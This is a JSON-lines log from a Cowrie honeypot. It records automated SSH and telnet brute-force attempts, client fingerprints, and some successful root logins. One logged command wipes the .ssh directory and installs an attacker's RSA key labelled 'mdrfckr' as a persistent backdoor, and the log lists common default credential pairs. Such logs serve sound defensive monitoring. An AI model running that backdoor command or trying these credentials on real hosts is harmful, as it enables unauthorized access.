{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:18:22.598413Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:18:22.812250Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:22.813124Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48309,"dst_ip":"1.2.3.4","dst_port":22,"session":"238ba99392be","protocol":"ssh","message":"New connection: 212.227.235.229:48309 (1.2.3.4:22) [session: 238ba99392be]","sensor":"my-vps","timestamp":"2025-08-31T06:18:23.027258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:18:23.028262Z","src_ip":"212.227.235.229","session":"238ba99392be"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:18:23.247067Z","src_ip":"212.227.235.229","session":"238ba99392be"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:18:24.160578Z","src_ip":"212.227.235.229","session":"238ba99392be"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:25.382176Z","src_ip":"212.227.235.229","session":"238ba99392be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47022,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ba9803ed862","protocol":"ssh","message":"New connection: 212.227.235.229:47022 (1.2.3.4:22) [session: 5ba9803ed862]","sensor":"my-vps","timestamp":"2025-08-31T06:18:25.598015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:18:25.600632Z","src_ip":"212.227.235.229","session":"5ba9803ed862"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:18:25.816507Z","src_ip":"212.227.235.229","session":"5ba9803ed862"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:18:26.685009Z","src_ip":"212.227.235.229","session":"5ba9803ed862"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:26.902828Z","src_ip":"212.227.235.229","session":"5ba9803ed862"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:26.903672Z","src_ip":"212.227.235.229","session":"78f45d8dc952"}
{"eventid":"cowrie.session.closed","duration":"65.1","message":"Connection lost after 65.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:30.049544Z","src_ip":"212.227.235.229","session":"aea9ef08e707"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34774,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec7e5e0fa327","protocol":"ssh","message":"New connection: 212.227.235.229:34774 (1.2.3.4:22) [session: ec7e5e0fa327]","sensor":"my-vps","timestamp":"2025-08-31T06:18:33.417696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:18:33.418776Z","src_ip":"212.227.235.229","session":"ec7e5e0fa327"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:18:33.699911Z","src_ip":"212.227.235.229","session":"ec7e5e0fa327"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":52564,"dst_ip":"1.2.3.4","dst_port":23,"session":"b57ae6d3085a","protocol":"telnet","message":"New connection: 3.130.96.91:52564 (1.2.3.4:23) [session: b57ae6d3085a]","sensor":"my-vps","timestamp":"2025-08-31T06:18:34.227966Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-31T06:18:34.229251Z","src_ip":"3.130.96.91","session":"b57ae6d3085a"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-31T06:18:34.229985Z","src_ip":"3.130.96.91","session":"b57ae6d3085a"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-31T06:18:34.230954Z","src_ip":"3.130.96.91","session":"b57ae6d3085a"}
{"eventid":"cowrie.session.closed","duration":0.13988447189331055,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:34.367769Z","src_ip":"3.130.96.91","session":"b57ae6d3085a"}
{"eventid":"cowrie.login.failed","username":"qwe","password":"qwe","message":"login attempt [qwe/qwe] failed","sensor":"my-vps","timestamp":"2025-08-31T06:18:34.866444Z","src_ip":"212.227.235.229","session":"ec7e5e0fa327"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:36.151735Z","src_ip":"212.227.235.229","session":"ec7e5e0fa327"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43472,"dst_ip":"1.2.3.4","dst_port":22,"session":"c774bbc6ed97","protocol":"ssh","message":"New connection: 212.227.235.229:43472 (1.2.3.4:22) [session: c774bbc6ed97]","sensor":"my-vps","timestamp":"2025-08-31T06:18:44.041298Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42074,"dst_ip":"1.2.3.4","dst_port":22,"session":"5244c26957c9","protocol":"ssh","message":"New connection: 212.227.235.229:42074 (1.2.3.4:22) [session: 5244c26957c9]","sensor":"my-vps","timestamp":"2025-08-31T06:18:44.887045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:18:46.076058Z","src_ip":"212.227.235.229","session":"5244c26957c9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:18:46.076770Z","src_ip":"212.227.235.229","session":"5244c26957c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39359,"dst_ip":"1.2.3.4","dst_port":22,"session":"65ca07191d1c","protocol":"ssh","message":"New connection: 212.227.235.229:39359 (1.2.3.4:22) [session: 65ca07191d1c]","sensor":"my-vps","timestamp":"2025-08-31T06:18:50.042794Z"}
{"eventid":"cowrie.login.failed","username":"test4","password":"welcome","message":"login attempt [test4/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T06:18:51.552687Z","src_ip":"212.227.235.229","session":"5244c26957c9"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:18:52.739946Z","src_ip":"212.227.125.160","session":"83a0d885ab2f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:18:52.903621Z","src_ip":"212.227.235.229","session":"c774bbc6ed97"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:18:52.978745Z","src_ip":"212.227.235.229","session":"c774bbc6ed97"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:18:53.300396Z","src_ip":"212.227.235.229","session":"5244c26957c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60110,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a3f8fa74119","protocol":"ssh","message":"New connection: 212.227.125.160:60110 (1.2.3.4:22) [session: 7a3f8fa74119]","sensor":"my-vps","timestamp":"2025-08-31T06:19:06.299562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:19:06.678864Z","src_ip":"212.227.125.160","session":"7a3f8fa74119"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:19:06.681836Z","src_ip":"212.227.125.160","session":"7a3f8fa74119"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35986,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0e0f3929741","protocol":"ssh","message":"New connection: 212.227.235.229:35986 (1.2.3.4:22) [session: c0e0f3929741]","sensor":"my-vps","timestamp":"2025-08-31T06:19:08.650391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:19:08.655351Z","src_ip":"212.227.235.229","session":"c0e0f3929741"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:19:08.911344Z","src_ip":"212.227.235.229","session":"c0e0f3929741"}
{"eventid":"cowrie.login.failed","username":"test4","password":"welcome","message":"login attempt [test4/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T06:19:09.349070Z","src_ip":"212.227.125.160","session":"7a3f8fa74119"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456789","message":"login attempt [guest/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T06:19:09.935505Z","src_ip":"212.227.235.229","session":"c0e0f3929741"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:19:10.894812Z","src_ip":"212.227.125.160","session":"7a3f8fa74119"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:19:11.195218Z","src_ip":"212.227.235.229","session":"c0e0f3929741"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:19:20.516100Z","src_ip":"212.227.125.160","session":"83a0d885ab2f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:19:20.516905Z","src_ip":"212.227.125.160","session":"83a0d885ab2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51132,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbab7d5a6554","protocol":"ssh","message":"New connection: 212.227.125.160:51132 (1.2.3.4:22) [session: cbab7d5a6554]","sensor":"my-vps","timestamp":"2025-08-31T06:19:23.138497Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":20236,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c3bdf59de8c","protocol":"ssh","message":"New connection: 212.227.235.229:20236 (1.2.3.4:22) [session: 3c3bdf59de8c]","sensor":"my-vps","timestamp":"2025-08-31T06:19:35.682300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:19:35.684604Z","src_ip":"212.227.235.229","session":"3c3bdf59de8c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:19:35.901899Z","src_ip":"212.227.235.229","session":"3c3bdf59de8c"}
{"eventid":"cowrie.login.failed","username":"ajay","password":"12345678","message":"login attempt [ajay/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:19:36.776097Z","src_ip":"212.227.235.229","session":"3c3bdf59de8c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:19:37.996868Z","src_ip":"212.227.235.229","session":"3c3bdf59de8c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"18.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 18.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:19:39.349045Z","src_ip":"212.227.125.160","session":"83a0d885ab2f"}
{"eventid":"cowrie.session.closed","duration":"85.8","message":"Connection lost after 85.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:19:39.350176Z","src_ip":"212.227.125.160","session":"83a0d885ab2f"}
